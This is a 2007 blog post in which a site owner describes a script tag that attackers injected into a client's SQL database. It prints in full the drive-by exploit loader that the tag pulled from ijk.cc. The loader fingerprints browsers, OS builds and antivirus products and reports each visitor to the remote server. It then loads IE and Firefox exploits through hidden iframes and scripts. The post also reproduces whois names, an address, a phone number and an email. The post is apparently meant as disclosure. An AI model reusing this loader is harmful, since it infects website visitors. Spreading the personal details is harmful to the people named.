Recently, on one of my clients sites, I noticed that some hacker scum had placed a script tag on some of the pages of the site by hacking into the SQL database and inserting the said script tag into a data field. This means that when the page is loaded, the script is also loaded.
The location of the script that is referred to is:
http://ijk.cc
The whois information for ijk.cc is:
Registrant:
robert kuphal
102 Greer Drive
Brunswick, GA 31520
US
Email: phu59@aol.com
Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: ijk.cc
Created on..............: Fri, Oct 27, 2006
Expires on..............: Sat, Oct 27, 2007
Record last updated on..: Sun, Dec 24, 2006
Administrative Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
Technical Contact:
Andrew McDonald
102 Greer Drive
Brunswick, GA 31520
US
Phone: +1.9418279024
Email: phu59@aol.com
DNS Servers:
ns82.websitewelcome.com
ns81.websitewelcome.com
The actual script that is at this locations is as follows:
// build: Fri Dec 29 07:37:24 2006
var debug=0;
var test_mode=0;
var cookie_name="userid1";
var cookie_value="11"; // increment it after each exploits update
var server_addr="ijk.cc";
var av_num_errs = 0, av_num_ready = 0, av_finished = 0;
var user_agent = "";
var os_version = 0;
var ie_version = 0, ie_build = 0, wmp_build = 0, av_id = 0;
var system_id = "none";
function print_dbg(str)
{
if (debug) {
document.writeln(str+"
");
}
}
function dbg_alert(str)
{
if (debug) {
alert(str);
}
}
function GetCookie(name) {
var dc = document.cookie;
var prefix = name + "=";
if (!dc) {
print_dbg("Cookies not set!");
return null;
}
var begin = dc.indexOf("; " + prefix);
if (begin == -1) {
begin = dc.indexOf(prefix);
if (begin != 0) {
print_dbg(prefix + " not found in cookie");
return null;
}
} else {
begin += 2;
}
var end = document.cookie.indexOf(";", begin);
if (end == -1) {
end = dc.length;
}
return unescape(dc.substring(begin + prefix.length, end));
}
function SetCookie(name, value, domain) {
var exp = new Date();
var two_years = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(two_years);
var curCookie = name + "=" + escape(value) + "; expires=" + exp.toGMTString();
document.cookie = curCookie;
print_dbg("Cookie ["+curCookie+"] set ok");
}
function GetUserAgent()
{
if (navigator.userAgent.indexOf("Opera") == -1 &&
navigator.userAgent.indexOf("Firefox") == -1 &&
navigator.userAgent.indexOf("MSIE") != -1 &&
navigator.userAgent.indexOf("Windows") != -1) {
return "ie";
}
if (navigator.userAgent.indexOf("Firefox") != -1) {
return "firefox";
}
if (navigator.userAgent.indexOf("Opera") != -1) {
return "opera";
}
return "unknown";
}
function GetIEBuild()
{
var fa, full_ver;
var ver_num;
oClientCaps = document.createElement("DIV");
oClientCaps.id = "oClientCaps";
oClientCaps.addBehavior("#default#clientCaps");
document.body.appendChild(oClientCaps);
full_ver = oClientCaps.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
return build_num;
}
function GetIEVersion()
{
var fa, full_ver;
var ver_num;
full_ver = oClientCaps.getComponentVersion ("{89820200-ECBD-11CF-8B85-00AA005B4383}","componentid");
fa = full_ver.split(",");
ver_num = parseInt(fa[0]) * 100 + parseInt(fa[1]);
return ver_num;
}
function GetWMPBuild()
{
var fa;
if (!oClientCaps.isComponentInstalled("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}", "ComponentID")) {
print_dbg("WMP not installed");
return 0;
}
full_ver = oClientCaps.getComponentVersion ("{22D6F312-B0F6-11D0-94AB-0080C74C7E95}","componentid");
fa = full_ver.split(",");
build_num = parseInt(fa[0]) * 10000000000 + parseInt(fa[1]) * 100000000 + parseInt(fa[2]) * 10000 + parseInt(fa[3]);
print_dbg(fa[0]+"."+fa[1]+"."+fa[2]+"."+ fa[3]);
return build_num;
}
function GetFirefoxVersion()
{
var found_ar, fa;
var ver_str = "", ver_num = 0;
re = /\sFirefox\/([\d\.]+)\b/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
print_dbg("regexp failed");
return 0;
}
fa = found_ar[1].split(".");
ver_num = (parseInt(fa[0]) * 1000000) + (parseInt(fa[1]) * 10000);
if (fa.length > 2) {
ver_num += parseInt(fa[2]) * 100;
}
if (fa.length > 3) {
ver_num += parseInt(fa[3]);
}
print_dbg("Firefox version: [" + ver_num + "]");
return ver_num;
}
function GetOSVersion()
{
var found_ar;
var os_ver = 0;
re = /Windows\sNT\s(\d)\.(\d)/;
found_ar = re.exec(navigator.userAgent);
if (!found_ar) {
return 0;
}
os_ver = parseInt(found_ar[1]) * 10 + parseInt(found_ar[2]);
//print_dbg("OS Version: [" + os_ver + "]");
return os_ver;
}
function ExecScript(script_src)
{
var st = document.getElementById('script1');
st.src = script_src;
return true;
}
function ExecIframe(iframe_src)
{
var iframe = document.getElementById('iframe1');
iframe.src = iframe_src;
return true;
}
///// EXPS
//
function exp_iscomponentinstalled()
{
print_dbg("Loading exp_iscomponentinstalled() for SP0");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
}
// Firefox compareto
//
function exp_ff104()
{
print_dbg("Loading exp_ff104()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
}
// Firefox navigator java
//
function exp_ff154()
{
print_dbg("Loading exp_ff154()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
}
// Windows 2000, IE 5.x
//
function exp_ms06_044()
{
print_dbg("Loading exp_ms06_044()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
// var my_src = "ww.js"
var url = 'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%20src%3D%27'+my_src+'%27%3E3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = url;
// ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
}
function exp_vml()
{
print_dbg("Loading vml_exp()");
if (test_mode) {
dbg_alert("Exploit not loaded: test mode");
return true;
}
ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
}
/////////// End of EXPS /////////////////
///////////////////////////////////////////////////////
function NotifyServerStart()
{
url = "http://"+server_addr+"/cgi-bin/jl/jloader.pl?source="+
location.hostname+"&system_id="+system_id;
if (user_agent == "ie") {
url = url+"&iebuild="+ie_build+"&wmpbuild="+wmp_build+"&av_id="+av_id;
}
print_dbg("===>>> notify: user_agent=["+user_agent+"] url=["+url+"]");
try {
var sl = document.getElementById('serv_note_link');
sl.src = url;
// serv_note_link.src = url;
} catch (e) {
print_dbg("Cannot find element id=serv_note_link");
};
}
progs=['NAVCfgWizDll.NAVCfgWizMgr', // 1 NAV
'McGDMgr.DwnldGroupMgr']; // 2 McAfee
cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4', // 3 trendmicro
'091EB208-39DD-417D-A5DD-7E2C2D8FB9CB', // 4 Windows Defender
'D653647D-D607-4DF6-A5B8-48D2BA195F7B', // 5 BitDefender Antivirus
'9F97547E-4609-42C5-AE0C-81C61FFAEBC3', // 6 AVG7
'65756541-C65C-11CD-0000-4B656E696100', // 7 Panda Antivirus
'1474F601-9B4B-4EB0-81FA-20F753C0E1A4', // 8 F-Prot
'D5507020-DB45-11d1-A5F0-00600872F78D', // 9 Norman Virus Control
'DD230880-495A-11D1-B064-008048EC2FC5', // 10 Kaspersky
'B089FE88-FB52-11D3-BDF1-0050DA34150D', // 11 Nod32
'472083B0-C522-11CF-8763-00608CC02F24', // 12 Avast
'45AC2688-0253-4ED8-97DE-B5370FA7D48A', // 13 Antivir
'8934FCEF-F5B8-468F-951F-78A921CD3920', // 14 Ewido
'1EB2409C-6E28-4066-9738-97A1B8F5639C', // 15 ??
'E7593602-124B-47C9-9F73-A69308EDC973', // 16 Dr Web
'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32
function av_err_event(i) {
av_num_errs++;
cids[i] = null;
}
function av_ready_event(i) {
var str = "ready: "+cids[i];
av_num_ready++;
if (av_finished) {
return;
}
if (cids[i] != null) {
var str = "av_redy_event(): Antivirus found: "+cids[i]+"!";
av_id = progs.length + i + 1;
av_finished = 1;
dbg_alert("av_redy_event(): Antivirus found: "+cids[i]+"!");
// jl_main2();
}
}
// Return:
// 1 - antivirus found
// 0 - operation in progress
//
function StartCheckAV()
{
var txt = "";
try {
var num_errs = 0;
print_dbg("Start check progs...");
for (i = 0; i < progs.length && !av_id; i++) {
try {
print_dbg("Checking "+progs[i]+"...");
new ActiveXObject(progs[i]);
print_dbg("Antivirus installed: " + progs[i]);
av_id = i + 1;
av_finished = 1;
}
catch (e) {};
}
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+" (progs)!");
return 1;
}
print_dbg("Start check antivirus CLSIDs");
for (i = 0; i < cids.length; i++) {
print_dbg("Creating "+cids[i]+"...");
txt += '<'+'/object>';
}
document.createElement('div').innerHTML = txt;
} catch (e) {};
if (av_id) {
print_dbg("Antivirus detected av_id="+av_id+"(cids, before callbacks)!");
return 1;
}
return 0;
}
function jl_main()
{
// dbg_alert("jl_main() started!");
if (!debug) {
try {
if (GetCookie(cookie_name) == cookie_value) {
print_dbg("Est kuka!");
return false;
}
SetCookie(cookie_name, cookie_value);
} catch (e) {};
}
// Get OS and browser versions
//
os_version = GetOSVersion();
user_agent = GetUserAgent();
// document.writeln("[Photo]");
var tmp_img = document.createElement("IMG");
tmp_img.id = "serv_note_link";
tmp_img.width = 0;
tmp_img.height = 0;
tmp_img.border = 0;
tmp_img.frameborder = 0;
tmp_img.src = "about:blank";
document.body.appendChild(tmp_img);
var iframe1 = document.createElement("IFRAME");
iframe1.id = "iframe1";
iframe1.border = 0;
iframe1.frameborder = 0;
iframe1.width = 0;
iframe1.height = 0;
document.body.appendChild(iframe1);
// document.writeln("");
var script1 = document.createElement("SCRIPT");
script1.id = "script1";
document.body.appendChild(script1);
// document.writeln("");
print_dbg("OS Version: NT " + os_version);
print_dbg("Browser: " + user_agent);
// Internet Explorer
//
if (user_agent == "ie") {
// Must do GetIEBuild() first!
//
ie_build = GetIEBuild();
ie_version = GetIEVersion();
wmp_build = GetWMPBuild();
print_dbg("IE version: [" + ie_version + "]");
print_dbg("IE build: [" + ie_build + "]");
print_dbg("WMP build: [" + wmp_build + "]");
// IE 7.x
//
if (ie_version >= 700) {
system_id = "ie7";
} else if (ie_version >= 600) {
// IE 6.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// Windows 2000
//
print_dbg("Win 2000 IE6");
system_id = "ie6_2k";
} else if (os_version == 51) {
// Windows XP
//
if (ie_build >= 60029002180) {
print_dbg("Win XP SP2");
system_id = "ie6_xpsp2";
} else if (ie_build >= 60028001106) {
print_dbg("Win XP SP1");
system_id = "ie6_xpsp1";
} else if (ie_build == 60026000000) {
print_dbg("Win XP SP0");
system_id = "ie6_xpsp0";
} else {
system_id = "ie6_xp";
print_dbg("Win XP SP unknown: " + ie_build);
}
} else {
// TODO: Support for 98, NT, Win2003, Vista
//
print_dbg("Win unsupported " + os_version);
system_id = "ie6_unknown";
}
} else if (ie_version < 600) {
// IE 5.x
//
print_dbg("IE " + ie_version + " ");
if (os_version == 50) {
// MSIE 5, Windows 2000
//
print_dbg("Win 2000");
system_id = "ie5_2k";
} else if (os_version < 50) {
print_dbg("Win NT " + os_version);
system_id = "ie5_nt";
}
}
StartCheckAV();
}
// Mozilla Firefox
//
if (user_agent == "firefox" && os_version != 0) {
var firefox_version = 0;
firefox_version = GetFirefoxVersion();
// Version <= 1.0.4
if (firefox_version <= 1000400) {
system_id = "ff104";
}
// 1.0.4 < Version < 1.5.0.4
if (firefox_version > 1000400 && firefox_version <= 1050004) {
system_id = "ff150";
}
}
jl_main2();
}
function set_window_status(stat_str)
{
window.status = stat_str;
}
function jl_main2()
{
av_finished = 1;
// print_dbg("av_on="+av_on);
NotifyServerStart();
set_window_status("Opening "+window.location.href+"...");
setTimeout("set_window_status('Done')", 5000);
print_dbg("system_id: "+system_id+" av_id="+av_id+" user_agent="+user_agent);
switch (system_id) {
case "ie7":
case "ie6_xp":
case "ie6_unknown":
case "ie6_xpsp2":
exp_vml();
break;
case "ie6_xpsp1":
exp_vml();
break;
case "ie6_xpsp0":
exp_iscomponentinstalled();
break;
case "ie6_2k":
exp_vml();
break;
case "ie5_2k":
exp_ms06_044();
break;
case "ie5_nt":
break;
case "ff104":
exp_ff104();
break;
case "ff150":
exp_ff154();
break;
default:
break;
}
// setTimeout('NotifyServerFinish()', 2000);
}
//jl_main();
// Run main function only after dom loaded
/* for Mozilla */
if (document.addEventListener) {
document.addEventListener("DOMContentLoaded", jl_main, false);
} else {
// IE
document.write("<"+"/script>");
}
I will be giving Mr Robert Kuphal of Brunswick, Georgia, USA a call to ask him why a link to a script hosted on his domain has been illegally inserted into the SQL database of the site.
Tuesday, August 07, 2007
Subscribe to:
Posts (Atom)